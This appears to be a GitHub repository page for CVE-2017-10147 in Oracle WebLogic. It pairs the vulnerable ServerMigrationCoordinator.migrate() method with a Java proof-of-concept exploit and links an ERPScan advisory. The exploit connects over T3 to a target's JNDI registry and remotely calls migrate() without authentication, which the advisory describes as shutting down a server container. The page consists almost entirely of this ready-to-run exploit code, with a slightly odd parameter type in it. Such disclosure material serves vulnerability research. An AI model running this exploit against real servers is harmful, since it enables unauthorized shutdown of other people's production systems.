Skip to content

Latest commit

 

History

History

CVE-2017-10147

Folders and files

NameName
Last commit message
Last commit date

parent directory

..
 
 

Vulnerable code

@Override
    public void migrate(final String serverName, final String sourceMachine, final String destinationMachine, final boolean sourceDown, final boolean destinationDown) throws ServerMigrationException {
        ServerMigrationTask task = this.taskMap.get(serverName);
        if (task == null) {
            task = new ServerMigrationTask(serverName, destinationMachine);
            if (MigrationDebugLogger.isDebugEnabled()) {
                MigrationDebugLogger.debug(serverName + " New Migration Task " + task);
            }
            this.taskMap.put(serverName, task);
            try {
                this.stopServer(sourceDown, task);
                this.startServer(destinationDown, task);
            }
            finally {
                this.taskMap.remove(serverName);
            }
            return;
        }
        throw new ServerMigrationException("Migration operation in progress", null);
    }

PoC

  static boolean PoC(String PS_SERVER_IP, Server PS_SERVER_PORT) throws NamingException, JMSException, RemoteException, T3Exception, ServerMigrationException {
          Properties p = new Properties();
          p.put(Context.INITIAL_CONTEXT_FACTORY, "weblogic.jndi.WLInitialContextFactory");
          p.put(Context.PROVIDER_URL, "t3://"+PS_SERVER_IP+":"+PS_SERVER_PORT);
          Context ctx = new InitialContext(p);
          Object obj = ctx.lookup("weblogic/cluster/singleton/ServerMigrationCoordinator");
          Object o = PortableRemoteObject.narrow(obj, ServerMigrationCoordinator.class);
          ServerMigrationCoordinator h = (ServerMigrationCoordinator) o;
          h.migrate("PIA","а","any_data_or_ip", true, true);
          return false;
      }

[Reference]https://erpscan.com/advisories/erpscan-17-041-unauthorized-container-shutdown-servermigrationcoordinator/